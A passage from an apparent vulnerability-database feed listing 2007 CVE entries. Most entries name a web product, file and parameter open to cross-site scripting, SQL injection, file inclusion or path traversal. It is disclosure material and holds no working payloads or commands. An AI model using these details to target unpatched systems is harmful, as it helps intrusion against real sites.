5.2 allows remote attackers to inject arbitrary web script or HTML via the func parameter. [CVE-2007-6177] PHP remote file inclusion vulnerability in Exchange/include.php in PHP_CON 1.3 allows remote attackers to execute arbitrary PHP code via a URL in the webappcfg[APPPATH] parameter. [CVE-2007-6173] Cross-site scripting (XSS) vulnerability in c/portal/login in Liferay Enterprise Portal 4.3.1 allows remote attackers to inject arbitrary web script or HTML via the emailAddress parameter in a Send New Password action, a different vector than CVE-2007-6055. NOTE: some of these details are obtained from third party information. [CVE-2007-6162] Cross-site scripting (XSS) vulnerability in index.php in FMDeluxe 2.1.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter in a category action. [CVE-2007-6160] Cross-site scripting (XSS) vulnerability in index.php in Tilde CMS 4.x and earlier allows remote attackers to inject arbitrary web script or HTML via the aarstal parameter in a yeardetail action. [CVE-2007-6158] Multiple SQL injection vulnerabilities in caladmin.inc.php in Proverbs Web Calendar 1.1 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) loginname (aka Username) and (2) loginpass (aka Password) parameters to caladmin.php. [CVE-2007-6157] Cross-site scripting (XSS) vulnerability in index.php in SimpleGallery 0.1.3 allows remote attackers to inject arbitrary web script or HTML via the album parameter. [CVE-2007-6156] Multiple cross-site scripting (XSS) vulnerabilities in base_qry_main.php in Base Analysis and Security Engine (BASE) before 1.3.9 allow remote attackers to inject arbitrary web script or HTML via the (1) sig[0] and (2) sig[1] parameters. [CVE-2007-6142] Multiple cross-site scripting (XSS) vulnerabilities in ph03y3nk just another flat file (JAF) CMS 4.0 RC2 allow remote attackers to inject arbitrary web script or HTML via the (1) show parameter to index.php and the (2) print parameter to print.php. NOTE: the provenance of this information is unknown [CVE-2007-6141] Cross-site scripting (XSS) vulnerability in vBTube.php in vBTube 1.1 Beta allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2007-6136] Multiplce cross-site scripting (XSS) vulnerabilities in index.php in M2Scripts MySpace Scripts Poll Creator allow remote attackers to inject arbitrary web script or HTML via the (1) title, (2) intro, and (3) question parameters, and (4) unspecified answer parameters, in a create_new action. NOTE: some of these details are obtained from third party information. [CVE-2007-6135] Cross-site scripting (XSS) vulnerability in phpslideshow.php in PHPSlideShow 0.9.9.2, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the directory parameter. NOTE: this issue was originally reported for toonchapter8.php, but this is probably a site-specific name, since the PHPSlideShow distribution does not contain that file. [CVE-2007-6128] SQL injection vulnerability in events.php in WorkingOnWeb 2.0.1400 allows remote attackers to execute arbitrary SQL commands via the idevent parameter. [CVE-2007-6126] Multiple cross-site scripting (XSS) vulnerabilities in project alumni 1.0.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the year parameter to (1) xml/index.php [CVE-2007-6124] Cross-site scripting (XSS) vulnerability in signin.php in Softbiz Freelancers Script 1 allows remote attackers to inject arbitrary web script or HTML via the errmsg parameter. [CVE-2007-6110] Cross-site scripting (XSS) vulnerability in htsearch in htdig 3.2.0b6 allows remote attackers to inject arbitrary web script or HTML via the sort parameter. [CVE-2007-6104] Cross-site scripting (XSS) vulnerability in the Instant Web Publishing feature in FileMaker Pro 7 and 8, Server 7 and 8, and Developer 7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-6102] Cross-site scripting (XSS) vulnerability in Feed to JavaScript (Feed2JS) 1.91 allows remote attackers to inject arbitrary web script or HTML via a URL in a feed. [CVE-2007-6100] Cross-site scripting (XSS) vulnerability in libraries/auth/cookie.auth.lib.php in phpMyAdmin before 2.11.2.2, when logins are authenticated with the cookie auth_type, allows remote attackers to inject arbitrary web script or HTML via the convcharset parameter to index.php, a different vulnerability than CVE-2005-0992. [CVE-2007-6090] Cross-site scripting (XSS) vulnerability in index.php in Nuked-Klan 1.7.5 allows remote attackers to inject arbitrary web script or HTML via the file parameter. NOTE: the provenance of this information is unknown [CVE-2007-6085] Multiple cross-site scripting (XSS) vulnerabilities in index.php in VigileCMS 1.4 allow remote attackers to inject arbitrary web script or HTML via the message field in the (1) vedipm or (2) live_chat module. [CVE-2007-6056] frame.html in Aida-Web (Aida Web) allows remote attackers to bypass a protection mechanism and obtain comment and task details via modified values to the (1) Mehr and (2) SUPER parameters. [CVE-2007-6055] Cross-site scripting (XSS) vulnerability in c/portal/login in Liferay Portal 4.1.0 and 4.1.1 allows remote attackers to inject arbitrary web script or HTML via the login parameter. NOTE: this issue reportedly exists because of a regression that followed a fix at an unspecified earlier date. [CVE-2007-6044] Multiple unspecified vulnerabilities in IBM WebSphere MQ 6.0 have unknown impact and remote attack vectors involving "memory corruption." NOTE: as of 20071116, the only disclosure is a vague pre-advisory with no actionable information. However, since it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2007-6039] PHP 5.2.5 and earlier allows context-dependent attackers to cause a denial of service (application crash) via a long string in (1) the domain parameter to the dgettext function, the message parameter to the (2) dcgettext or (3) gettext function, the msgid1 parameter to the (4) dngettext or (5) ngettext function, or (6) the classname parameter to the stream_wrapper_register function. NOTE: this might not be a vulnerability in most web server environments that support multiple threads, unless this issue can be demonstrated for code execution. [CVE-2007-6037] Cross-site scripting (XSS) vulnerability in ws/generic_api_call.pl in Citrix NetScaler 8.0 build 47.8 allows remote attackers to inject arbitrary web script or HTML via the standalone parameter and other unspecified parameters. [CVE-2007-6032] SQL injection vulnerability in calendar/page.asp in Aleris Web Publishing Server 3.0 allows remote attackers to execute arbitrary SQL commands via the mode parameter. [CVE-2007-6018] IMP Webmail Client 4.1.5, Horde Application Framework 3.1.5, and Horde Groupware Webmail Edition 1.0.3 does not validate unspecified HTTP requests, which allows remote attackers to (1) delete arbitrary e-mail messages via a modified numeric ID or (2) "purge" deleted emails via a crafted email message. [CVE-2007-6005] Unspecified vulnerability in the GpcContainer.GpcContainer.1 ActiveX control in WebEx allows remote attackers to cause a denial of service (memory access violation and crash) via (1) an invalid argument to the InitParam method or (2) an unspecified vector involving the SetParam method. [CVE-2007-6003] Cross-site scripting (XSS) vulnerability in cgi/b/ic/connect in the Thomson SpeedTouch 716 with firmware 5.4.0.14 allows remote attackers to inject arbitrary web script or HTML via the url parameter. NOTE: the provenance of this information is unknown [CVE-2007-6002] Cross-site scripting (XSS) vulnerability in Fenriru (1) Sleipnir 2.5.17 R2 and earlier and (2) Grani 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the Search field in a search for additions to the Favorites section. [CVE-2007-6001] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Bandersnatch 0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) func or (2) date parameter, or the jid parameter in a (3) log or (4) user action, a different vulnerability than CVE-2007-3910. [CVE-2007-5993] Cross-site scripting (XSS) vulnerability in Visionary Technology in Library Solutions (VTLS) vtls.web.gateway before 48.1.1 allows remote attackers to inject arbitrary web script or HTML via the searchtype parameter. [CVE-2007-5990] Cross-site scripting (XSS) vulnerability in ExoPHPdesk allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in a user profile, possibly the (1) name and (2) website parameters to register.php. [CVE-2007-5985] Multiple cross-site scripting (XSS) vulnerabilities in BtiTracker before 1.4.5 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors to (1) account.php, (2) moresmiles.php, or (3) recover.php [CVE-2007-5983] Cross-site scripting (XSS) vulnerability in index.php in Justin Hagstrom AutoIndex PHP Script before 2.2.3 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF). [CVE-2007-5982] Multiple cross-site scripting (XSS) vulnerabilities in X7 Chat 2.0.4, 2.0.5, and possibly other versions allow remote attackers to inject arbitrary web script or HTML via the (1) room parameter to sources/frame.php, the (2) theme_c parameter to help/index.php, or the (3) INSTALL_X7CHATVERSION parameter to upgradev1.php. [CVE-2007-5980] Cross-site scripting (XSS) vulnerability in home/rss.php in eggblog before 3.1.1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF). [CVE-2007-5979] Cross-site scripting (XSS) vulnerability in download_plugin.php3 in F5 Firepass 4100 SSL VPN 5.4 through 5.5.2 and 6.0 through 6.0.1 allows remote attackers to inject arbitrary web script or HTML via the backurl parameter. [CVE-2007-5977] Cross-site scripting (XSS) vulnerability in db_create.php in phpMyAdmin before 2.11.2.1 allows remote authenticated users with CREATE DATABASE privileges to inject arbitrary web script or HTML via a hex-encoded IMG element in the db parameter in a POST request, a different vulnerability than CVE-2006-6942. [CVE-2007-5961] Cross-site scripting (XSS) vulnerability in the Red Hat Network channel search feature, as used in RHN and Red Hat Network Satellite before 5.0.2, allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2007-5955] Cross-site scripting (XSS) vulnerability in updir.php in UPDIR.NET before 2.04 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-5954] Cross-site scripting (XSS) vulnerability in buscador.php in JLMForo System allows remote attackers to inject arbitrary web script or HTML via the clave parameter. NOTE: the provenance of this information is unknown [CVE-2007-5952] Cross-site scripting (XSS) vulnerability in admin/index.php in Helios Calendar 1.2.1 Beta allows remote attackers to inject arbitrary web script or HTML via the username parameter. NOTE: the provenance of this information is unknown [CVE-2007-5950] Cross-site scripting (XSS) vulnerability in NetCommons before 1.0.11, and 1.1.x before 1.1.2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2006-4165. [CVE-2007-5949] Cross-site scripting (XSS) vulnerability in IBM Tivoli Service Desk 6.2 allows remote authenticated users to inject arbitrary web script or HTML via the Description parameter in a Maximo change action. [CVE-2007-5948] Multiple cross-site scripting (XSS) vulnerabilities in main.php in SF-Shoutbox 1.2.1 through 1.4 allow remote attackers to inject arbitrary web script or HTML via the (1) nick (aka Name) and (2) shout (aka Shout) parameters. [CVE-2007-5944] Cross-site scripting (XSS) vulnerability in Servlet Engine / Web Container in IBM WebSphere Application Server (WAS) 5.1.1.4 through 5.1.1.16 allows remote attackers to inject arbitrary web script or HTML via the Expect HTTP header. NOTE: this might be the same issue as CVE-2006-3918, but there are insufficient details to be sure. [CVE-2007-5934] The LOB functionality in PEAR MDB2 before 2.5.0a1 interprets a request to store a URL string as a request to retrieve and store the contents of the URL, which might allow remote attackers to use MDB2 as an indirect proxy or obtain sensitive information via a URL into a form field in an MDB2 application, as demonstrated by a file:// URL or a URL for an intranet web site. [CVE-2007-5932] Multiple cross-site scripting (XSS) vulnerabilities in Fatwire Content Server (CS) CMS 6.3.0 allow remote attackers to inject arbitrary web script or HTML via unspecified form fields related to the (1) search function, (2) advanced search function, and possibly other components. [CVE-2007-5924] Cross-site scripting (XSS) vulnerability in the Web Server (HTTP) task in IBM Lotus Domino before 6.5.6 FP2, and 7.x before 7.0.2 FP2, allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-5923] Cross-site scripting (XSS) vulnerability in forms/smpwservices.fcc in CA (formerly Computer Associates) eTrust SiteMinder Agent allows remote attackers to inject arbitrary web script or HTML via the SMAUTHREASON parameter, a different vector than CVE-2005-2204. [CVE-2007-5921] Unspecified vulnerability in the ioctl interface in the Solaris Volume Manager (SVM) in Sun Solaris 9 and 10 allows local users to cause a denial of service (panic) via unspecified vectors, a different vulnerability than CVE-2004-1346. [CVE-2007-5919] MyWebFTP, possibly 5.3.2, stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain an MD5 password hash via a direct request for pass/pass.txt. [CVE-2007-5891] Multiple cross-site scripting (XSS) vulnerabilities in jsp/Login.do in ManageEngine OpManager MSP Edition and OpManager 7.0 allow remote attackers to inject arbitrary web script or HTML via the (1) requestid, (2) fileid, (3) woMode, and (2) woID parameters. NOTE: the provenance of this information is unknown [CVE-2007-5888] Cross-site scripting (XSS) vulnerability in displayecard.php in Coppermine Photo Gallery (CPG) before 1.4.14 allows remote attackers to inject arbitrary web script or HTML via the data parameter. [CVE-2007-5858] WebKit in Safari in Apple Mac OS X 10.4.11 and 10.5.1, iPhone 1.0 through 1.1.2, and iPod touch 1.1 through 1.1.2 allows remote attackers to "navigate the subframes of any other page," which can be leveraged to conduct cross-site scripting (XSS) attacks and obtain sensitive information. [CVE-2007-5834] Cross-site scripting (XSS) vulnerability in BosDev BosNews 4 allows remote attackers to inject arbitrary web script or HTML via a SCRIPT element in a news post. [CVE-2007-5833] Multiple cross-site scripting (XSS) vulnerabilities in BosDev BosMarket Business Directory System allow remote authenticated users to inject arbitrary web script or HTML via (1) user info (account details) or (2) a post. [CVE-2007-5830] Unspecified vulnerability in the administrative interface in Avaya Messaging Storage Server (MSS) 3.1 before SP1, and Message Networking (MN) 3.1, allows remote attackers to cause a denial of service via unspecified vectors related to "input validation." [CVE-2007-5825] Format string vulnerability in the ws_addarg function in webserver.c in mt-dappd in Firefly Media Server 0.2.4 and earlier allows remote attackers to execute arbitrary code via a stats method action to /xml-rpc with format string specifiers in the (1) username or (2) password portion of base64-encoded data on the "Authorization: Basic" HTTP header line. [CVE-2007-5824] webserver.c in mt-dappd in Firefly Media Server 0.2.4 and earlier allows remote attackers to cause a denial of service (NULL dereference and daemon crash) via a stats method action to /xml-rpc with (1) an empty Authorization header line, which triggers a crash in the ws_decodepassword function [CVE-2007-5815] Absolute path traversal vulnerability in the WebCacheCleaner ActiveX control 1.3.0.3 in SonicWall SSL-VPN 200 before 2.1, and SSL-VPN 2000/4000 before 2.5, allows remote attackers to delete arbitrary files via a full pathname in the argument to the FileDelete method. [CVE-2007-5810] Hitachi Web Server 01-00 through 03-00-01, as used by certain Cosminexus products, does not properly validate SSL client certificates, which might allow remote attackers to spoof authentication via a client certificate with a forged signature. [CVE-2007-5809] Cross-site scripting (XSS) vulnerability in Hitachi Web Server 01-00 through 03-10, as used by certain Cosminexus products, allows remote attackers to inject arbitrary web script or HTML via unspecified HTTP requests that trigger creation of a server-status page. [CVE-2007-5808] Unspecified vulnerability in the Groupmax Collaboration - Schedule component in Hitachi Groupmax Collaboration Portal 07-30 through 07-30-/F and 07-32 through 07-32-/C, uCosminexus Collaboration Portal 06-30 through 06-30-/F and 06-32 through 06-32-/C, and Groupmax Collaboration Web Client - Mail/Schedule 07-30 through 07-30-/F and 07-32 through 07-32-/B might allow remote attackers to obtain sensitive information via unspecified vectors related to schedule portlets. [CVE-2007-5806] Cross-site scripting (XSS) vulnerability in Services/Utilities/classes/class.ilUtil.php in ILIAS 3.8.3 and earlier allows remote attackers to inject arbitrary web script or HTML via attributes inside a domain-name string in the (1) mailing or (2) forum component, as demonstrated using the style and onmouseover HTML attributes. [CVE-2007-5803] Multiple cross-site scripting (XSS) vulnerabilities in CGI programs in Nagios before 2.12 might allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2007-5624 and CVE-2008-1360. [CVE-2007-5799] Multiple cross-site request forgery (CSRF) vulnerabilities in uddigui/navigateTree.do in the UDDI user console in IBM WebSphere Application Server (WAS) before 6.1.0 Fix Pack 13 (6.1.0.13) allow remote attackers to perform some actions as WAS UDDI users via the (1) keyField, (2) nameField, (3) valueField, and (4) frameReturn parameters. [CVE-2007-5798] Multiple cross-site scripting (XSS) vulnerabilities in uddigui/navigateTree.do in the UDDI user console in IBM WebSphere Application Server (WAS) before 6.1.0 Fix Pack 13 (6.1.0.13) allow remote attackers to inject arbitrary web script or HTML via the (1) keyField, (2) nameField, (3) valueField, and (4) frameReturn parameters. [CVE-2007-5796] Cross-site scripting (XSS) vulnerability in the management console in Blue Coat ProxySG before 4.2.6.1, and 5.x before 5.2.2.5, allows remote attackers to inject arbitrary web script or HTML by modifying the URL that is used for loading Certificate Revocation Lists. [CVE-2007-5787] Micro Login System 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a file containing a password via a direct request for userpwd.txt. [CVE-2007-5779] Buffer overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3.dll 1.0.0.12 in Gretech Online Movie Player (GOM Player) 2.1.6.3499 allows remote attackers to execute arbitrary code via a long argument to the OpenUrl method. [CVE-2007-5777] Blue-Collar Productions i-Gallery 3.4 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a file containing a base64-encoded password via a direct request for igallery.mdb. [CVE-2007-5770] The (1) Net::ftptls, (2) Net::telnets, (3) Net::imap, (4) Net::pop, and (5) Net::smtp libraries in Ruby 1.8.5 and 1.8.6 do not verify that the commonName (CN) field in a server certificate matches the domain name in a request sent over SSL, which makes it easier for remote attackers to intercept SSL transmissions via a man-in-the-middle attack or spoofed web site, different components than CVE-2007-5162. [CVE-2007-5761] The NantSys device 5.0.0.115 in Motorola netOctopus 5.1.2 build 1011 has weak permissions for the \\.\NantSys device interface (nantsys.sys), which allows local users to gain privileges or cause a denial of service (system crash), as demonstrated by modifying the SYSENTER_EIP_MSR CPU Model Specific Register (MSR) value. [CVE-2007-5735] eFileMan 7.1.0.87-88 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain unspecified user information via a direct request for cgi-bin/efileman/efileman_config.pm. [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461. [CVE-2007-5728] Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865. [CVE-2007-5727] Incomplete blacklist vulnerability in the stripScripts function in common.php in OneOrZero Helpdesk 1.6.5.4, 1.6.4.2, and possibly other versions, allows remote attackers to conduct cross-site scripting (XSS) attacks and inject arbitrary web script or HTML via XSS sequences without SCRIPT tags in the description parameter to (1) tcreate.php or (2) tupdate.php, as demonstrated using an onmouseover event in a b tag. [CVE-2007-5725] Multiple cross-site scripting (XSS) vulnerabilities in Smart-Shop allow remote attackers to inject arbitrary web script or HTML via (1) the email parameter to index.php [CVE-2007-5724] Multiple cross-site scripting (XSS) vulnerabilities in Omnistar Live allow remote attackers to inject arbitrary web script or HTML via (1) the category_id parameter to users/kb.php, and possibly (3) the Email Box field in profile.php. [CVE-2007-5710] Cross-site scripting (XSS) vulnerability in wp-admin/edit-post-rows.php in WordPress 2.3 allows remote attackers to inject arbitrary web script or HTML via the posts_columns array parameter. [CVE-2007-5702] Cross-site scripting (XSS) vulnerability in swamp/action/LoginActions (aka the login box) in the Novell OpenSUSE SWAMP Workflow Administration and Management Platform 1.x allows remote attackers to inject arbitrary web script or HTML via the username parameter. NOTE: some of these details are obtained from third party information. [CVE-2007-5698] Cross-site scripting (XSS) vulnerability in default.asp in CREApark GOLD KOY PORTALI allows remote attackers to inject arbitrary web script or HTML via the aranan parameter. NOTE: the provenance of this information is unknown [CVE-2007-5695] Open redirect vulnerability in command.php in SiteBar 3.3.8 allows remote attackers to redirect users to arbitrary web sites via a URL in the forward parameter in a Log In action. [CVE-2007-5692] Multiple cross-site scripting (XSS) vulnerabilities in SiteBar 3.3.8 allow remote attackers to inject arbitrary web script or HTML via (1) the lang parameter to integrator.php [CVE-2007-5690] DISPUTED Buffer overflow in sethdlc.c in the Asterisk Zaptel 1.4.5.1 might allow local users to gain privileges via a long device name (interface name) in the ifr_name field. NOTE: the vendor disputes this issue, stating that the application requires root access, so privilege boundaries are not crossed. [CVE-2007-5685] The safe_path function in shttp before 0.0.5 allows remote attackers to conduct directory traversal attacks and read files via a combination of ".." and sub-directory specifiers that resolve to a pathname that is at or below the same level as the web document root, but in a different part of the directory tree. [CVE-2007-5683] Multiple cross-site scripting (XSS) vulnerabilities in TikiWiki 1.9.8.1 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the username parameter to the password reminder page (tiki-remind_password.php), (2) IMG tags in wiki pages, and (3) the local_php parameter to db/tiki-db.php. [CVE-2007-5677] Cross-site scripting (XSS) vulnerability in shoutbox/blocco.php in Hackish BETA 1.1 allows remote attackers to inject arbitrary web script or HTML via the go_shout parameter. [CVE-2007-5673] Cross-site scripting (XSS) vulnerability in cgi-bin/webif.exe in ifnet WebIf allows remote attackers to inject arbitrary web script or HTML via the cmd parameter. [CVE-2007-5660] Unspecified vulnerability in the Update Service ActiveX control in isusweb.dll before 6.0.100.65101 in MacroVision FLEXnet Connect and InstallShield 2008 allows remote attackers to execute arbitrary code via an unspecified "unsafe method," possibly involving a buffer overflow. [CVE-2007-5654] LiteSpeed Web Server before 3.2.4 allows remote attackers to trigger use of an arbitrary MIME type for a file via a "%00." sequence followed by a new extension, as demonstrated by reading PHP source code via requests for .php%00.txt files, aka "Mime Type Injection." [CVE-2007-5649] Cross-site scripting (XSS) vulnerability in lostpwd.php in Creative Digital Resources SocketMail 2.2.1 allows remote attackers to inject arbitrary web script or HTML via the lost_id parameter. [CVE-2007-5648] Multiple cross-site scripting (XSS) vulnerabilities in rnote.php in rNote 0.9.7.5 allow remote attackers to inject arbitrary web script or HTML via the (1) d or the (2) u parameter. [CVE-2007-5647] Multiple cross-site scripting (XSS) vulnerabilities in SocketKB 1.1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) art_id or (2) node parameter in an article action to the default URI. [CVE-2007-5629] Cross-site scripting (XSS) vulnerability in admin/logon.asp in ShoppingTree CandyPress Store 4.1 allows remote attackers to inject arbitrary web script or HTML via the msg parameter, a different vector than CVE-2007-2804. NOTE: the provenance of this information is unknown [CVE-2007-5628] PHP remote file inclusion vulnerability in src/scripture.php in The Online Web Library Site (TOWels) 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the pageHeaderFile parameter. [CVE-2007-5625] Cross-site scripting (XSS) vulnerability in filename.asp in ASP Site Search SearchSimon Lite 1.0 allows remote attackers to inject arbitrary web script or HTML via the QUERY parameter. [CVE-2007-5624] Cross-site scripting (XSS) vulnerability in Nagios 2.x before 2.10 allows remote attackers to inject arbitrary web script or HTML via unknown vectors to unspecified CGI scripts. [CVE-2007-5613] Cross-site scripting (XSS) vulnerability in Dump Servlet in Mortbay Jetty before 6.1.6rc1 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters and cookies. [CVE-2007-5598] Cross-site scripting (XSS) vulnerability in Weblinks for Drupal 4.7.x before 4.7.x-1.0 and 5.x before 5.x-1.8 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-5589] Muliple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.11.1.2 allow remote attackers to inject arbitrary web script or HTML via certain input available in (1) PHP_SELF in (a) server_status.php, and (b) grab_globals.lib.php, (c) display_change_password.lib.php, and (d) common.lib.php in libraries/ [CVE-2007-5588] Cross-site scripting (XSS) vulnerability in mnoGoSearch before 3.2.43 allows remote attackers to inject arbitrary web script or HTML via the t parameter in search.cgi, as reachable from search.htm-dist. [CVE-2007-5582] Cross-site scripting (XSS) vulnerability in the login page in Cisco CiscoWorks Server (CS), possibly 2.6 and earlier, when using CiscoWorks Common Services 3.0.x and 3.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-5581] Multiple cross-site scripting (XSS) vulnerabilities in mpweb/scripts/mpx.dll in Cisco Unified MeetingPlace 5.4 and earlier and 6.0 allow remote attackers to inject arbitrary web script or HTML via the (1) FirstName and (2) LastName parameters. [CVE-2007-5578] Basic Analysis and Security Engine (BASE) before 1.3.8 sends a redirect to the web browser but does not exit, which allows remote attackers to bypass authentication via (1) base_main.php, (2) base_qry_alert.php, and possibly other vectors. [CVE-2007-5577] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.0.13 (aka Sunglow) allow remote attackers to inject arbitrary web script or HTML via the (1) Title or (2) Section Name form fields in the Section Manager component, or (3) multiple unspecified fields in New Menu Item. [CVE-2007-5576] BEA Tuxedo 8.0 before RP392 and 8.1 before RP293, and WebLogic Enterprise 5.1 before RP174, echo the password in cleartext, which allows physically proximate attackers to obtain sensitive information via the (1) cnsbind, (2) cnsunbind, or (3) cnsls commands. [CVE-2007-5564] Multiple cross-site scripting (XSS) vulnerabilities in NSSboard (formerly Simple PHP Forum) 6.1 allow remote attackers to inject arbitrary web script or HTML via (1) HTML tags when BBcode is disabled [CVE-2007-5562] Cross-site scripting (XSS) vulnerability in cgi-bin/welcome (aka the login page) in Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 allows remote attackers to inject arbitrary web script or HTML via the err parameter in the context of an error page. [CVE-2007-5547] Cross-site scripting (XSS) vulnerability in Cisco IOS allows remote attackers to inject arbitrary web script or HTML, and execute IOS commands, via unspecified vectors, aka PSIRT-2022590358. NOTE: as of 20071016, the only disclosure is a vague pre-advisory with no actionable information. However, since it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2007-5531] Unspecified vulnerability in Oracle Help for Web, as used in Oracle Application Server, Oracle Database 10.2.0.3, and Enterprise Manager 10.1.0.6, has unknown impact and remote attack vectors, aka EM02. [CVE-2007-5529] Unspecified vulnerability in the Oracle Self-Service Web Applications component in client-only installations of Oracle E-Business Suite 11.5.10.2 has unknown impact and remote attack vectors, aka APP08. [CVE-2007-5496] Cross-site scripting (XSS) vulnerability in setroubleshoot 2.0.5 allows local users to inject arbitrary web script or HTML via a crafted (1) file or (2) process name, which triggers an Access Vector Cache (AVC) log entry in a log file used during composition of HTML documents for sealert. [CVE-2007-5483] Unspecified vulnerability in the Administrative Scripting Tools (such as wsadmin or ANT) in IBM WebSphere Application Server 5.x and 6.0.x has unknown impact and attack vectors. [CVE-2007-5482] Unspecified vulnerability in the FTP service in Sun StorEdge/StorageTek 3510 FC Array with firmware before 4.21 allows remote attackers, with access to the Ethernet management interface, to cause a denial of service (I/O request timeout and device hang) via unspecified vectors. [CVE-2007-5480] Multiple cross-site scripting (XSS) vulnerabilities in InnovaAge InnovaShop allow remote attackers to inject arbitrary web script or HTML via the (1) msg parameter to msg.jsp, and the (2) contentid parameter to tc/contents/home001.jsp. [CVE-2007-5479] Cross-site scripting (XSS) vulnerability in Search.asp in Xcomputer allows remote attackers to inject arbitrary web script or HTML via the EXPS parameter. [CVE-2007-5478] Cross-site scripting (XSS) vulnerability in projects in Nabh Stringbeans Portal (sbportal) 3.2 allows remote attackers to inject arbitrary web script or HTML via the project_name parameter. [CVE-2007-5477] Cross-site scripting (XSS) vulnerability in auth.w in djeyl.net WebMod 0.48 Half-Life Dedicated Server plugin allows remote attackers to inject arbitrary web script or HTML via the redir parameter. [CVE-2007-5473] StaticFileHandler.cs in System.Web in Mono before 1.2.5.2, when running on Windows, allows remote attackers to obtain source code of sensitive files via a request containing a trailing (1) space or (2) dot, which is not properly handled by XSP. [CVE-2007-5472] Cross-site scripting (XSS) vulnerability in the Server component in CA Host-Based Intrusion Prevention System (HIPS) before 8.0.0.93 allows remote attackers to inject arbitrary web script or HTML via requests that are written to logs for later display in the log viewer. [CVE-2007-5463] ideal_process.php in the iDEAL payment module in ViArt Shop 3.3 beta and earlier might allow remote attackers to obtain the pathname for certificate and key files via an "iDEAL transaction", possibly involving fopen error messages for nonexistent files, a different issue than CVE-2007-5364. NOTE: this can be leveraged for reading certificate or key files if an installation places these files under the web document root. [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag. [CVE-2007-5459] Cross-site scripting (XSS) vulnerability in the sidebar HTML page in the MouseoverDictionary before 0.6.2 extension for Mozilla Firefox allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-5455] Cross-site scripting (XSS) vulnerability in wxis.exe in WWWISIS 7.1 and earlier allows remote attackers to inject arbitrary web script or HTML via a call to the iah/iah.xis IsisScript code, possibly involving the lang or exprSearch parameter. [CVE-2007-5443] Multiple cross-site scripting (XSS) vulnerabilities in CMS Made Simple 1.1.3.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) the anchor tag and (2) listtags. [CVE-2007-5437] The web console in CA (formerly Computer Associates) eTrust ITM (Threat Manager) 8.1 allows remote attackers to redirect users to arbitrary web sites via a crafted HTTP URL on port 6689. [CVE-2007-5434] Cross-site scripting (XSS) vulnerability in PRO-search 0.17.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter to the default URI. [CVE-2007-5433] Multiple cross-site scripting (XSS) vulnerabilities in index.cgi in Site-Up 2.64 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) search or (2) search mask field. [CVE-2007-5429] Cross-site scripting (XSS) vulnerability in index.php in Nucleus 3.01 allows remote attackers to inject arbitrary web script or HTML via the archive parameter. [CVE-2007-5428] Cross-site scripting (XSS) vulnerability in UMI CMS allows remote attackers to inject arbitrary web script or HTML via the search_string parameter to the default URI in search_do/. [CVE-2007-5427] Cross-site scripting (XSS) vulnerability in the com_search component in Joomla! 1.0.13 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchword parameter. NOTE: this might be related to CVE-2007-4189.1. [CVE-2007-5426] Multiple cross-site scripting (XSS) vulnerabilities in ActiveKB NX 2.5.4 allow remote attackers to inject arbitrary web script or HTML via the page parameter to the default URI for some directories, as demonstrated by (1) ActiveKB/ and (2) default/categories/ActiveKB/. [CVE-2007-5420] The 3Com 3CRWER100-75 router with 1.2.10ww software, when remote management is disabled but a web server has been configured, serves a web page to external clients, which might allow remote attackers to obtain information about the router's existence and product details. [CVE-2007-5415] Cross-site scripting (XSS) vulnerability in Mozilla Firefox 2.0, when UTF-7 document content is rendered directly in UTF-7, allows remote attackers to inject arbitrary web script or HTML via a gopher URI that uses '/' (slash) characters to delimit a literal string within an XSS sequence, a related issue to CVE-2007-5414. [CVE-2007-5414] Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 2.0, when UTF-7 document content is rendered directly in UTF-7, 